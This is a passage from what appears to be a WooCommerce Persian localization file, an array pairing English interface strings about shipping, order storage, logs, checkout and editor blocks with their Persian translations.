کرد.','Product image matching by SKU'=>'تطبیق تصویر محصول با شناسه','Desktop'=>'دسکتاپ','Tablet'=>'تبلت','Mobile'=>'موبایل','Customer history'=>'سابقه مشتری','No search results.'=>'هیچ نتیجه‌ای برای جستجو یافت نشد.','Search within these files'=>'جستجو داخل این فایل‌ها','Line %s'=>'خط %s','Line #'=>'خط #','Could not access file.'=>'نمی‌توان به فایل دسترسی داشت.','The number of search results has reached the limit of %s. Try refining your search.'=>'تعداد نتایج جستجو به حداکثر محدودیت %s رسیده است. جستجوی خود را اصلاح کنید.','An error occurred while cleaning up order %1$d: %2$s'=>'هنگام پاکسازی سفارش %1$d خطایی روی داد: %2$s','Could not access the specified files.'=>'دسترسی به فایل‌های مشخص شده امکان پذیر نیست.','%d is not a valid order ID.'=>'%d شناسه سفارش معتبری نیست.','Order is not an HPOS order.'=>'سفارش یک سفارش HPOS نیست.','Matched Line'=>'خط هم خوانی','%s attribution'=>'%s ارجاع','Order Attribution'=>'تخصیص سفارش','⚠️ Only %s files can be searched at one time. Try filtering the file list before searching.'=>'⚠️ فقط %s فایل را می‌توان در یک زمان جستجو کرد. قبل از جستجو، لیست فایل‌ها را فیلتر کنید.','Could not write to the temp directory. Try downloading files one at a time instead.'=>'نمی‌توان در پوشۀ موقت نوشت. در عوض سعی کنید پرونده‌ها را یکی یکی بارگیری کنید.','Multiple files match this ID.'=>'چندین پرونده با این شناسه مطابقت دارند.','%s expired log file was deleted.'=>'%s فایل گزارش منقضی شده حذف شد.','Cleanup completed for %d order.'=>'پاکسازی برای %d سفارش تکمیل شد.','The field %s is required.'=>'فیلد %s ضروری است.','The field %s is invalid.'=>'فیلد %s نامعتبر است.','Free Plan Available'=>'پلن رایگان در دسترس است','Rated %1$d out of 5'=>'دارای امتیاز %1$d از 5','Cleanup completed for order %d.'=>'پاکسازی برای سفارش %d تکمیل شد.','No orders to cleanup.'=>'سفارشی برای پاکسازی وجود ندارد.','Simplified shipping with: '=>'حمل و نقل ساده با: ','Highly discounted shipping rates'=>'نرخ حمل و نقل با تخفیف بالا','Branded tracking experience'=>'تجربه ردیابی برند','Cleanup can only be performed when HPOS is active and compatibility mode is disabled.'=>'پاکسازی تنها زمانی قابل انجام است که HPOS فعال و حالت سازگاری غیرفعال باشد.','Built-in Tax & Duties paperwork'=>'اسناد مالیاتی و عوارض داخلی','Shop the sale'=>'خرید فروش','HPOS cleanup'=>'پاکسازی HPOS','Seamless order sync and label printing'=>'همگام‌سازی یکپارچۀ سفارش و چاپ برچسب','The field %1$s is invalid for the location %2$s.'=>'زمینۀ %1$s برای مکان %2$s نامعتبر است.','Starting cleanup for %d order...'=>'پاکسازی برای %d سفارش آغاز شد...','This product is already installed.'=>'این محصول قبلا نصب شده است.','You do not have permission to manage log entries.'=>'شما اجازه مدیریت گزارش‌های ورودی را ندارید.','Context'=>'متن نوشته','Additional context'=>'نوشته اضافی','Show context'=>'نمایش نوشته','Hide context'=>'مخفی کردن نوشته','There was an error getting the install URL for this product.'=>'در دریافت URL نصب این محصول خطایی روی داد.','block titleNo results'=>'بدون نتیجه','block keywordProduct Collection'=>'مجموعه محصول','block descriptionThe contents of this block will display when there are no products found.'=>'محتوای این بلوک زمانی نمایش داده می‌شود که هیچ محصولی پیدا نشود.','block titleRating Filter'=>'صافی امتیاز','Refresh'=>'تازه‌سازی','Subscribe'=>'اشتراک','%s icon'=>'نمادک %s','This product will not trigger your customer\'s shipping calculator in cart or at checkout. This product also won\'t require your customers to enter their shipping details at checkout. Read more about virtual products.'=>'این محصول حساب‌گر ارسال مشتری شما را در سبد خرید یا هنگام تسویه حساب فعال نمی‌کند. این محصول هم‌چنین مشتریان شما را ملزم نمی‌کند که جزئیات ارسال سفارش خود را در هنگام تسویه حساب وارد کنند. درباره محصولات مجازی بیشتر بخوانید.','Buy button text'=>'متن دکمه خرید','Enter the external URL to the product'=>'URL خارجی محصول را وارد کنید','Link to the external product'=>'پیوند به محصول خارجی','Buy button'=>'دکمه خرید','Link to the external product is an invalid URL.'=>'پیوند به محصول خارجی یک آدرس نامعتبر است.','Add a link and choose a label for the button linked to a product sold elsewhere.'=>'یک پیوند اضافه کنید و یک برچسب برای دکمۀ مرتبط با محصولی که در جای دیگری فروخته می‌شود انتخاب کنید.','This product has options, such as size or color. You can now manage each variation\'s inventory and other details individually.'=>'این محصول دارای گزینه‌هایی مانند اندازه یا رنگ است. اکنون می‌توانید موجودی هر تنوع و سایر جزئیات را به صورت جداگانه مدیریت کنید.','This product has options, such as size or color. You can manage each variation\'s images, downloads, and other details individually.'=>'این محصول دارای گزینه‌هایی مانند اندازه یا رنگ است. می‌توانید تصاویر، دانلودها و سایر جزئیات هر تنوع را به صورت جداگانه مدیریت کنید.','Help customers find this product by assigning it to categories, adding extra details, and managing its visibility in your store and other channels.'=>'با اختصاص دادن آن به دسته‌ها، افزودن جزئیات بیشتر و مدیریت رویت‌پذیری آن در فروشگاه و کانال‌های دیگر، به مشتریان کمک کنید این محصول را پیدا کنند.','This product has options, such as size or color. You can now manage each variation\'s shipping settings and other details individually.'=>'این محصول گزینه‌هایی مانند اندازه یا رنگ دارد. اکنون می‌توانید تنظیمات ارسال و سایر جزئیات هر تنوع را به صورت جداگانه مدیریت کنید.','This variation will not trigger your customer\'s shipping calculator in cart or at checkout. This product also won\'t require your customers to enter their shipping details at checkout. Read more about virtual products.'=>'این تنوع، محاسبه‌گر حمل و نقل مشتری شما را در سبد خرید یا هنگام تسویه حساب فعال نمی‌کند. همچنین این محصول نیازی به وارد کردن جزئیات ارسال توسط مشتریان شما در هنگام تسویه حساب ندارد. درباره محصولات مجازی بیشتر بخوانید.','Customers will need to spend this amount to get free shipping.'=>'مشتریان باید این مبلغ را برای ارسال رایگان هزینه کنند.','Delete this log file permanently?'=>'این فایل گزارش برای همیشه حذف شود؟','Viewing log file %s'=>'مشاهده فایل گزارش %s','Select the %1$s log file for %2$s'=>'فایل گزارش %1$s را برای %2$s انتخاب کنید','Filter by log source'=>'فیلتر بر اساس منبع گزارش','No log files found.'=>'هیچ فایل گزارشی یافت نشد.','This file does not exist.'=>'این فایل وجود ندارد.','Could not access the log file directory.'=>'دسترسی به دایرکتوری فایل log امکان پذیر نیست.','You do not have permission to manage log files.'=>'شما اجازه مدیریت فایل های گزارش را ندارید.','File rotations:'=>'چرخش فایل:','Browse log files'=>'فایل های گزارش را مرور کنید','File size'=>'حجم فایل','Date modified'=>'تاریخ ویرایش شد','e.g. Local pickup'=>'به عنوان مثال، دریافت حضوری','Current'=>'فعلی','Return to the file list.'=>'بازگشت به لیست فایل.','Caught exception while enqueuing action "%1$s": %2$s'=>'خطایی هنگام درج در صف انتظار اقدام "%1$s" رخ داد: %2$s','%1$s was called with an invalid event type "%2$s".'=>'%1$s با نوع رویداد نامعتبر "%2$s" فراخوانی شد.','%s log file deleted.'=>'%s فایل گزارش حذف شد.','Your customers will see the name of this shipping method during checkout.'=>'مشتریان شما نام این روش حمل و نقل را در هنگام تسویه حساب خواهند دید.','WooCommerce Store Identifier.'=>'شناسه فروشگاه ووکامرس.','A minimum order amount AND coupon'=>'حداقل مبلغ سفارش و کوپن','A minimum order amount OR coupon'=>'حداقل مبلغ سفارش یا کوپن','Free shipping requires'=>'حمل و نقل رایگان نیاز دارد','e.g. Free shipping'=>'به عنوان مثال، ارسال رایگان','These costs can optionally be added based on the product shipping class. Learn more about setting shipping class costs.'=>'این هزینه‌ها را می‌توان به‌صورت اختیاری بر اساس کلاس ارسال محصول اضافه کرد. درباره تنظیم هزینه های کلاس حمل و نقل بیشتر بیاموزید.','e.g. Standard national'=>'به عنوان مثال، استاندارد ملی','advanced costs'=>'هزینه های پیشرفته','No requirement'=>'بدون ضرورت','Charge a flat rate per item, or enter a cost formula to charge a percentage based cost or a minimum fee. Learn more about'=>'برای هر کالا نرخ ثابتی تعیین کنید، یا فرمول هزینه را برای تعیین هزینه بر اساس درصد یا حداقل هزینه وارد کنید. درباره ما بیشتر بدانید','Attribute terms.'=>'اصطلاحات ویژگی.','Please enter a valid number.'=>'لطفا یک شماره معتبر وارد کنید.','Add to cart: “%s”'=>'افزودن به سبد خرید: “%s”','A shipping zone consists of the region(s) you\'d like to ship to and the shipping method(s) offered. A shopper can only be matched to one zone, and we\'ll use their shipping address to show them the methods available in their area.'=>'منطقه حمل و نقل شامل ناحیه یا نواحی‌ای است که می‌خواهید به آنجا ارسال داشته باشید و همچنین روش‌های حمل و نقلی که ارائه می‌دهید. هر خریدار فقط می‌تواند به یک منطقه اختصاص داده شود و ما از آدرس حمل و نقل او برای نمایش روش‌های حمل و نقلی که در منطقه او در دسترس هستند، استفاده می‌کنیم.','An optional zone you can use to set the shipping method(s) available to any regions that have not been listed above.'=>'یک منطقه اختیاری که می‌توانید از آن برای تنظیم روش(های) حمل و نقل در دسترس برای هر منطقه‌ای که در بالا ذکر نشده است استفاده کنید.','Add the shipping methods you\'d like to make available to customers in this zone.'=>'روش‌های حمل و نقلی را که می‌خواهید برای مشتریان در این منطقه در دسترس قرار دهید، اضافه کنید.','List the regions you\'d like to include in your shipping zone. Customers will be matched against these regions.'=>'مناطقی را که می خواهید در منطقه حمل و نقل خود بگنجانید فهرست کنید. مشتریان با این مناطق همسان خواهند شد.','e.g. For heavy items requiring higher postage'=>'به عنوان مثال، برای اقلام سنگین که نیاز به هزینه پست بیشتر دارند','e.g. Heavy'=>'به عنوان مثال، سنگین','Use shipping classes to customize the shipping rates for different groups of products, such as heavy items that require higher postage fees.'=>'از کلاس های حمل و نقل برای سفارشی کردن نرخ حمل و نقل برای گروه های مختلف محصولات، مانند اقلام سنگینی که نیاز به هزینه پست بالاتری دارند، استفاده کنید.','Classes'=>'کلاس ها','Create shipping method'=>'ایجاد روش حمل و نقل','Add shipping class costs'=>'هزینه های کلاس حمل و نقل را اضافه کنید','Add zone'=>'اضافه کردن منطقه','STEP 1 OF 2'=>'مرحله ۱ از ۲','STEP 2 OF 2'=>'مرحله ۲ از ۲','e.g. heavy-packages'=>'به عنوان مثال، بسته‌های-سنگین','Give your zone a name! E.g. Local, or Worldwide.'=>'به منطقه خود یک نام بدهید! به عنوان مثال. محلی، یا جهانی.','Slug (unique identifier) can be left blank and auto-generated, or you can enter one'=>'نامک (شناسه منحصر بفرد) را می‌توان خالی گذاشت و به طور خودکار تولید کرد یا می‌توانید یکی وارد کنید','Give your shipping class a name for easy identification'=>'برای شناسایی آسان کلاس حمل و نقل خود، یک نام به آن اختصاص دهید','Set up %s'=>'راه اندازی %s','Subscription not found'=>'اشتراک پیدا نشد','Unknown error'=>'خطای ناشناخته','This product has been activated.'=>'این محصول فعال شده است.','There was an error activating this plugin.'=>'در فعال سازی این افزونه خطایی روی داد.','This product is already active.'=>'این محصول در حال حاضر فعال است.','This product is not installed.'=>'این محصول نصب نشده است.','We couldn\'t find a subscription for this product.'=>'ما نتوانستیم اشتراکی برای این محصول پیدا کنیم.','There was an error disconnecting your subscription. Please try again.'=>'هنگام قطع ارتباط اشتراک شما خطایی روی داد. لطفا دوباره تلاش کنید.','Your subscription has been disconnected.'=>'اشتراک شما قطع شده است.','There was an error connecting your subscription. Please try again.'=>'هنگام اتصال اشتراک شما خطایی روی داد. لطفا دوباره تلاش کنید.','Your subscription has been connected.'=>'اشتراک شما متصل شده است.','There was an error activating this theme.'=>'هنگام فعال کردن این پوسته خطایی روی داد.','"%1$s" was removed from the cart. %2$s'=>'"%1$s" از سبد خرید حذف شد. %2$s','block descriptionDisplays WooCommerce page content.'=>'محتوای برگه‌ی ووکامرس را نمایش می‌دهد.','block titleWooCommerce Page'=>'برگه‌ی ووکامرس','block descriptionDisplay the items purchased and order totals.'=>'موارد خریداری شده و جمع کل سفارش را نمایش می‌دهد.','block descriptionDisplay the order details section.'=>'بخش جزئیات سفارش را نمایش می‌دهد.','block titleOrder Totals Section'=>'بخش مجموع سفارش','block descriptionDisplay a "thank you" message, or a sentence regarding the current order status.'=>'نمایش پیام «متشکریم» یا جمله‌ی دیگر، با توجه به وضعیت فعلی سفارش.','block titleOrder Status'=>'وضعیت سفارش','block keywordtext'=>'متن','block titleProduct text field'=>'فیلد متن محصول','block keywordnumber'=>'عدد','block descriptionDisplay the downloadable products section.'=>'نمایش بخش محصولات قابل دانلود.','block titleAdditional Information'=>'اطلاعات اضافی','block titleBilling Address Section'=>'بخش آدرس صورتحساب','block descriptionDisplay the order summary on the order confirmation page.'=>'نمایش خلاصه سفارش در صفحه تایید سفارش.','block titleShipping Address Section'=>'بخش آدرس حمل و نقل','block titleOrder Downloads'=>'دانلودهای سفارش','block titleDownloads Section'=>'بخش دانلودها','block keyworddownloads'=>'دانلودها','block titleClassic Shortcode'=>'کد کوتاه کلاسیک','block titleProduct downloads'=>'دریافت محصول','block descriptionDisplay the order confirmation shipping section.'=>'بخش حمل و نقل تاییدیه سفارش را نمایش دهید.','block descriptionDisplay the order confirmation billing section.'=>'بخش صورتحساب تایید سفارش را نمایش دهید.','block descriptionDisplay the order confirmation billing address.'=>'نشانی صورتحساب تایید سفارش را نمایش دهید.','block descriptionA text field for use in the product editor.'=>'یک فیلد متنی برای استفاده در ویرایشگر محصول.','block descriptionA reusable number field for the product editor.'=>'یک فیلد شماره قابل استفاده مجدد برای ویرایشگر محصول.','block descriptionA reusable checkbox for the product editor.'=>'یک چک باکس قابل استفاده مجدد برای ویرایشگر محصول.','block descriptionDisplay the order confirmation shipping address.'=>'نشانی ارسال تاییدیه سفارش را نمایش دهید.','block descriptionRenders classic WooCommerce shortcodes.'=>'کدهای کوتاه قدیمی ووکامرس را رندر می‌کند.','block descriptionThe product downloads.'=>'بارگیری‌های محصول.','block descriptionDisplays additional information provided by third-party extensions for the current order.'=>'اطلاعات اضافی ارائه شده توسط افزودنی‌های شخص ثالث را برای سفارش فعلی نمایش می‌دهد.','block titleProduct number control'=>'کنترل شماره محصول','block titleOrder Totals'=>'مجموع سفارش','block descriptionDisplay links to purchased downloads.'=>'نمایش لینک‌های دانلودهای خریداری شده.','days'=>'روز','%1$s %2$d'=>'%1$s %2$d','Themes'=>'پوسته‌ها','Search results'=>'نتایج جستجو','Variation details'=>'جزییات تنوع','Same as main product'=>'همانند محصول اصلی','Background sync is enabled.'=>'همگام سازی پس زمینه فعال است.','You’re editing details specific to this variation. Some information, like description and images, will be inherited from the main product, .'=>'شما در حال ویرایش جزئیات خاص این تنوع هستید. برخی از اطلاعات، مانند توضیحات و تصاویر، از محصول اصلی، به ارث می‌رسد.','Add and manage attributes used for product options, such as size and color.'=>'ویژگی های مورد استفاده برای گزینه های محصول، مانند اندازه و رنگ را اضافه و مدیریت کنید.','This variation requires shipping or pickup'=>'این تنوع نیاز به ارسال یا دریافت حضوری دارد','This product requires shipping or pickup'=>'این محصول نیاز به ارسال یا دریافت حضوری دارد','Add any files you\'d like to make available for the customer to download after purchasing, such as instructions or warranty info.'=>'هر فایلی را که می‌خواهید پس از خرید برای دانلود مشتری در دسترس باشد، مانند دستورالعمل‌ها یا اطلاعات گارانتی، اضافه کنید.','Good news! WooCommerce Tax can automate your sales tax calculations for you.'=>'خبر خوب! مالیات ووکامرس می تواند محاسبات مالیات فروش شما را برای شما خودکار کند.','Product Variation Template'=>'قالب تنوع محصول','Template for the product variation form'=>'قالب فرم تنوع محصول','Template namePage: Cart'=>'صفحه: سبد خرید','Template namePage: Checkout'=>'صفحه: تسویه حساب','Try again'=>'تلاش دوباره','Confirm email and view order'=>'ایمیل را تایید کنید و سفارش را مشاهده کنید','Alternatively, confirm the email address linked to the order below.'=>'یا آدرس ایمیل مرتبط با سفارش زیر را تأیید کنید.','Great news! Your order has been received, and a confirmation will be sent to your email address.'=>'خبر عالی! سفارش شما دریافت شده است و تاییدیه به آدرس ایمیل شما ارسال خواهد شد.','If you\'ve just placed an order, give your email a quick check for the confirmation.'=>'اگر به تازگی سفارشی را ثبت کرده اید، ایمیل خود را برای تایید سریع بررسی کنید.','Failed to fetch dummy products.'=>'واکشی محصولات ساختگی انجام نشد.','Please check your email for the order confirmation.'=>'لطفا ایمیل خود را برای تایید سفارش، بررسی کنید.','Thank you. Your order has been fulfilled.'=>'متشکرم. سفارش شما انجام شد.','Your order has been cancelled.'=>'سفارش شما لغو شد.','Have an account with us? %1$sLog in here%2$s to view your order.'=>'اینجا حساب کاربری دارید؟ برای مشاهده سفارش خود %1$sاینجا وارد شوید%2$s.','Have an account with us? %1$sLog in here to view your order details%2$s.'=>'اینجا حساب کاربری دارید؟ %1$sبرای مشاهده جزئیات سفارش خود اینجا وارد شوید%2$s.','Your order cannot be processed as the originating bank/merchant has declined your transaction. Please attempt your purchase again.'=>'سفارش شما قابل پردازش نیست زیرا بانک/مرچنت، مبدا تراکنش شما را رد کرده است. لطفا دوباره اقدام به خرید کنید.','Your order was refunded %s.'=>'سفارش شما در %s بازگردانده شد.','The Order Confirmation template serves as a receipt and confirmation of a successful purchase. It includes a summary of the ordered items, shipping, billing, and totals.'=>'قالب تایید سفارش به عنوان رسید و تایید یک خرید موفق عمل می‌کند. این شامل خلاصه‌ای از اقلام سفارش داده شده، حمل و نقل، صورتحساب و مجموع است.','The item type.'=>'نوع اقلام.','Limit result set to products with specified attributes.'=>'مجموعه نتایج را به محصولات با ویژگی‌های مشخص محدود کنید.','Learn about new products and discounts'=>'با محصولات جدید و تخفیف ها آشنا شوید','Placeholder image used to represent products being showcased under the social media icons. 2 out of 4.'=>'تصویر نمایشی برای نشان دادن محصولات نمایش داده شده زیر آیکون‌های شبکه‌های اجتماعی. ۲ از ۴.','Placeholder image used to represent products being showcased under the social media icons. 3 out of 4.'=>'تصویر نمایشی برای نشان دادن محصولات نمایش داده شده زیر آیکون‌های شبکه‌های اجتماعی. ۳ از ۴.','Placeholder image used to represent products being showcased under the social media icons. 4 out of 4.'=>'تصویر نمایشی برای نشان دادن محصولات نمایش داده شده زیر آیکون‌های شبکه‌های اجتماعی. ۴ از ۴.','Placeholder image used to represent products being showcased under the social media icons. 1 out of 4.'=>'تصویر نمایشی برای نشان دادن محصولات نمایش داده شده زیر آیکون‌های شبکه‌های اجتماعی. ۱ از ۴.','Placeholder image used to represent a product being showcased.'=>'تصویر جایگزین که برای نمایش محصول به کار می‌رود.','Attribute term.'=>'اصطلاح ویژگی.','Default values for generated variations.'=>'مقادیر پیشفرض برای تنوع‌های تولید شده.','Page where shoppers go to finalize their purchase'=>'برگه‌ای که خریداران برای نهایی کردن خرید خود به آنجا مراجعه می‌کنند','Page where shoppers review their shopping cart'=>'برگه‌ای که در آن خریداران سبد خرید خود را بررسی می‌کنند','block titleNext/Previous Buttons'=>'دکمه‌های قبلی/بعدی','block keywordtaxonomy'=>'طبقه‌بندی','block titleProduct Tag'=>'برچسب محصول','block titleTaxonomy'=>'طبقه‌بندی','block descriptionA block that displays a taxonomy field, allowing searching, selection, and creation of new items'=>'بلوکی که یک فیلد طبقه بندی را نمایش می دهد و امکان جستجو، انتخاب و ایجاد موارد جدید را می دهد','block descriptionDisplay next and previous buttons.'=>'نمایش دکمه‌های بعدی و قبلی.','Logo'=>'لوگو','New, faster way to find extensions and themes for your WooCommerce store'=>'راه جدید و سریع‌تر برای یافتن افزودنی‌ها و پوسته‌ها برای فروشگاه ووکامرسی شما','Search results for: %s'=>'نتایج جستجو برای: %s','HPOS disabled.'=>'HPOS غیرفعال شد.','HPOS could not be disabled.'=>'HPOS را نمی‌توان غیرفعال کرد.','HPOS is already disabled.'=>'HPOS قبلا غیرفعال شده است.','HPOS could not be enabled.'=>'HPOS را نمی‌توان فعال کرد.','HPOS enabled.'=>'HPOS فعال شد.','HPOS is already enabled.'=>'HPOS قبلا فعال شده است.','[Failed] Orders table could not be created.'=>'[ناموفق] جدول سفارشات ایجاد نشد.','Running pre-disable checks...'=>'اجرای بررسی‌های پیش‌غیرفعال...','WordPress posts storage (legacy)'=>'ذخیره‌سازی نوشته‌های وردپرس (قدیمی)','[Failed] There are orders pending sync. Please run `%s` to sync pending orders.'=>'[ناموفق] سفارشاتی در انتظار همگام‌سازی وجود دارد. لطفا %s را برای همگام‌سازی سفارشات معلق اجرا کنید.','Audio'=>'صدا','High-performance order storage (recommended)'=>'ذخیره‌سازی سفارش با کارایی بالا (توصیه شده)','Orders table created.'=>'جدول سفارشات ایجاد شد.','Orders table does not exist. Creating...'=>'جدول سفارشات وجود ندارد. در حال ایجاد...','[Failed] This is not a new shop, but --for-new-shop flag was passed.'=>'[ناموفق بود] این یک فروشگاه جدید نیست، اما پرچم ‎--for-new-shop تنظیم شده است.','Order data storage'=>'ذخیره‌سازی داده‌های سفارش','[Failed] Some installed plugins are incompatible. Please review the plugins by going to WooCommerce > Settings > Advanced > Features and see the "Order data storage" section.'=>'[ناموفق] برخی از افزونه‌های نصب شده ناسازگار هستند. لطفا افزونه‌ها را با رفتن به ووکامرس > پیکربندی > پیشرفته > امکانات مرور کنید و بخش «ذخیره‌سازی داده‌های سفارش» را ببینید.','HPOS pre-checks failed, please see the errors above'=>'بررسی های قبلی HPOS انجام نشد، لطفا خطاهای بالا را ببینید','[Failed] The orders table does not exist and this is not a new shop. Please create the table by going to WooCommerce > Settings > Advanced > Features and enabling sync.'=>'[ناموفق] جدول سفارشات وجود ندارد و این فروشگاه جدیدی نیست. لطفا جدول را با رفتن به ووکامرس > تنظیمات > پیشرفته > ویژگی ها و فعال کردن همگام سازی ایجاد کنید.','Choose your theme'=>'پوسته خود را انتخاب کنید','Simple Product Template'=>'قالب تک محصول','Create new category'=>'ایجاد دسته‌بندی تازه','Join the community'=>'به انجمن بپیوندید','Choose a theme that best fits your brand\'s look and feel, then make it your own. Change the colors, add your logo, and create pages.'=>'پوسته‌ای را انتخاب کنید که به بهترین وجه با ظاهر و احساس برند شما مطابقت داشته باشد، سپس آن را برای خود بسازید. رنگ‌ها را تغییر دهید، لوگوی خود را اضافه کنید و برگه ایجاد کنید.','Shown to customers on the product page.'=>'در صفحه محصول به مشتریان نشان داده می شود.','Template for the simple product form'=>'الگویی برای فرم ساده محصول','Limit result set to products with or without price.'=>'مجموعه نتایج را به محصولات با قیمت یا بدون قیمت محدود کنید.','These account details will be displayed within the order thank you page and confirmation email.'=>'این جزئیات حساب در صفحه تشکر سفارش و ایمیل تأیید نمایش داده می شود.','Placeholder image with the avatar of the user who is writing the testimonial.'=>'نگهدارنده مکان تصویر با نیم‌رخ کاربری که در حال نوشتن توصیه‌نامه است.','Select values'=>'انتخاب مقادیر','Orders table does not exist.'=>'جدول سفارشات وجود ندارد.','Per your %1$sstore settings%2$s, inventory management is disabled.'=>'طبق %1$sتنظیمات فروشگاه%2$s شما، مدیریت موجودی غیرفعال است.','Discover ways of extending your store with a tour of the Woo Marketplace'=>'راه‌های گسترش فروشگاه خود را با گشت و گذار در Woo Marketplace کشف کنید','Running pre-enable checks...'=>'اجرای بررسی‌های پیش‌از فعال‌سازی...','Enter some descriptive text. Use “%s” to separate different values.'=>'مقداری متن توصیفی وارد کنید. از "%s" برای جدا کردن مقادیر مختلف استفاده کنید.','Custom order tables could not be created.'=>'جدول‌های سفارش مخصوص نمی‌تواند ایجاد شود.','Custom order tables were created successfully.'=>'جدول‌های سفارش مخصوص با موفقیت ایجاد شد.','Custom order tables does not exist, creating...'=>'جدول‌های سفارش مخصوص وجود ندارند؛ در حال ایجاد...','Venezuelan bolívar (2008–2018)'=>'Venezuelan bolívar (2008–2018)','block titleThumbnails'=>'تصاویر بندانگشتی','block descriptionDisplay the Thumbnails of a product.'=>'نمایش تصاویر بندانگشتی یک محصول.','block keywordProducts (Beta)'=>'محصولات (بتا)','block titleProduct Rating Counter'=>'شمارنده امتیاز محصول','block descriptionDisplay the review count of a product'=>'نمایش تعداد بررسی‌های یک محصول','block descriptionDisplay a button for shoppers to quickly view their cart.'=>'یک دکمه برای خریداران نمایش دهید تا به سرعت سبد خرید خود را مشاهده کنند.','block titleMini-Cart'=>'سبد خرید کوچک','block descriptionAllow customers to breeze through with quick payment options.'=>'به مشتریان اجازه دهید با گزینه‌های پرداخت سریع، سروکار داشته باشند.','block keywordpassword'=>'رمز عبور','block titleProduct password'=>'رمز محصول','block keywordcatalog'=>'کاتالوگ','block titleProduct catalog visibility'=>'قابلیت مشاهده کاتالوگ محصول','block titleProduct Average Rating (Beta)'=>'میانگین امتیاز محصول (بتا)','block descriptionDisplay the average rating of a product'=>'نمایش میانگین امتیاز یک محصول','block titleProduct variations options'=>'گزینه‌های تنوع‌های محصول','block descriptionThe product variations items.'=>'موارد تنوع‌های محصول.','block descriptionThe product variations options.'=>'گزینه‌های تنوع‌های محصول.','block titleProduct variations items'=>'موارد تنوع‌های محصول','block descriptionA checkbox and an input to type a password to view a product.'=>'یک چک‌باکس و یک ورودی برای تایپ رمز عبور برای مشاهده یک محصول.','block descriptionA checkbox to manage the catalog visibility of the product.'=>'یک چک باکس برای مدیریت نمایان بودن کاتالوگ محصول.','block keywordnotice'=>'اعلان','block descriptionNotice description'=>'توضیح اعلان','block titleNotice'=>'اعلان','Hide in product catalog'=>'در کاتالوگ محصولات پنهان باشد','Hide from search results'=>'در نتایج جستجو پنهان باشد','Product catalog'=>'کاتالوگ محصول','Organization'=>'سازمان','Require a password'=>'یک رمز عبور لازم است','Go to Variations'=>'به تنوع‌ها بروید','Customize your store '=>'فروشگاه خود را شخصی‌سازی کنید ','Status of the order.'=>'وضعیت سفارش.','This order belongs to a different customer.'=>'این سفارش متعلق به مشتری دیگری است.','%s in cart'=>'%s در سبد خرید','Order totals.'=>'مجموع سفارش.','Unique identifier for the fee within the cart'=>'شناسه منحصربه‌فرد برای مبلغ داخل سبد خرید','If the quantity is editable or fixed.'=>'اگر مقدار قابل ویرایش یا ثابت باشد.','Invalid billing email provided.'=>'ایمیل صورتحسابی که ارائه شده نامعتبر است.','Total tax on items in the order.'=>'کل مالیات بر اقلام سفارش.','Total price of items in the order.'=>'قیمت کل اقلام سفارش.','Unique identifier for the item.'=>'شناسه منحصر به فرد برای مورد.','This order cannot be paid for.'=>'این سفارش قابل پرداخت نیست.','The item product or variation ID.'=>'شناسه محصول یا تنوع کالا.','Total tax applied to the order.'=>'کل مالیات اعمال شده برای سفارش.','Subtotal of the order.'=>'جمع جزء سفارش.','Invalid order ID or key provided.'=>'شناسه یا کلید سفارش ارائه شده نامعتبر است.','The Mini-Cart template allows shoppers to see their cart items and provides access to the Cart and Checkout pages.'=>'قالب سبد خرید کوچک به خریداران این امکان را می‌دهد که اقلام سبد خرید خود را ببینند و دسترسی به صفحات سبد خرید و پرداخت را فراهم می‌کند.','The maximum quantity allowed for this line item.'=>'حداکثر مقدار مجاز برای این خط مورد.','The minimum quantity allowed for this line item.'=>'حداقل مقدار مجاز برای این خط مورد.','Total refund applied to the order.'=>'استرداد وجه کل برای سفارش اعمال شد.','Quantity of this item.'=>'تعداد این مورد.','database errorunknown'=>'ناشناخته','Shop Now'=>'اکنون خرید کنید','Post password.'=>'رمز ِ عبور نوشته.','Installation date of the WooCommerce mobile app.'=>'تاریخ نصب اپلیکیشن موبایل ووکامرس.','We use only the highest-quality materials in our products, ensuring that they look great and last for years to come.'=>'ما در محصولات خود فقط از با کیفیت‌ترین مواد استفاده می‌کنیم و اطمینان حاصل می‌کنیم که آنها عالی به نظر برسند و برای سال‌های آینده دوام می‌آورند.','Deletes unused variations.'=>'تنوع‌های استفاده نشده را حذف می‌کند.','Shop All'=>'خرید همه','Shop new arrivals'=>'خرید محصولات جدید','Unable to claim actions. Database error: %s.'=>'قادر به مطالبه اقدامات نیست. خطای پایگاه داده: %s.','Action Scheduler was unable to delete action %1$d. Reason: %2$s'=>'برنامه زمان‌بندی اقدام نتوانست اقدام %1$d را حذف کند. دلیل: %2$s','block keywordMy Account'=>'حساب کاربری من','block descriptionShowcase your products relevant images and media.'=>'تصاویر و رسانه‌های مرتبط با محصولات خود را به نمایش بگذارید.','block descriptionDisplay the average rating of a product with stars'=>'نمایش میانگین امتیاز یک محصول با ستاره','block keywordvariations'=>'تنوع‌ها','block descriptionThe product subsection.'=>'زیربخش محصول.','block titleProduct Rating Stars'=>'ستاره‌های امتیاز محصولات','block titleProduct Price'=>'قیمت محصول','%1$sView and manage%2$s'=>'%1$sمشاهده و مدیریت%2$s','⚠ Incompatible plugins detected (%1$s, %2$s and %3$d other).'=>'⚠ افزونه‌های ناسازگار شناسایی شدند (%1$s، %2$s و %3$d افزونه دیگر).','⚠ 2 Incompatible plugins detected (%1$s and %2$s).'=>'⚠ ۲ افزونه ناسازگار شناسایی شد (%1$s و %2$s).','⚠ 1 Incompatible plugin detected (%s).'=>'⚠ ۱ افزونه ناسازگار شناسایی شد (%s).','High-Performance order storage'=>'ذخیره‌سازی سفارش با کارایی بالا','Currently syncing orders... %s pending'=>'در حال همگام‌سازی سفارشات... %s در انتظار','Klaviyo'=>'Klaviyo','Grow and retain customers with intelligent, impactful email and SMS marketing automation and a consolidated view of customer interactions.'=>'با خودکارسازی بازاریابی ایمیلی و پیامکی هوشمند و تاثیرگذار و دیدگاه تلفیقی از تعاملات مشتری، مشتریان را رشد و حفظ کنید.','Filter out results where any of the passed fields are empty'=>'در جایی که هر یک از فیلدهای ارسال شده خالی است، نتایج را فیلتر کنید','Template nameCheckout Header'=>'سربرگ تسویه حساب','Template nameOrder Confirmation'=>'تاییدیه سفارش','The Checkout template guides users through the final steps of the purchase process. It enables users to enter shipping and billing information, select a payment method, and review order details.'=>'قالب صورت‌حساب، کاربران را در مراحل نهایی فرآیند خرید راهنمایی می‌کند. به کاربران این امکان را می‌دهد که اطلاعات حمل و نقل و صورت‌حساب را وارد کنند، روش پرداخت را انتخاب کنند و جزئیات سفارش را بررسی کنند.','Template used to display the simplified Checkout header.'=>'قالب مورد استفاده برای نمایش سربرگ ساده شده پرداخت.','Order 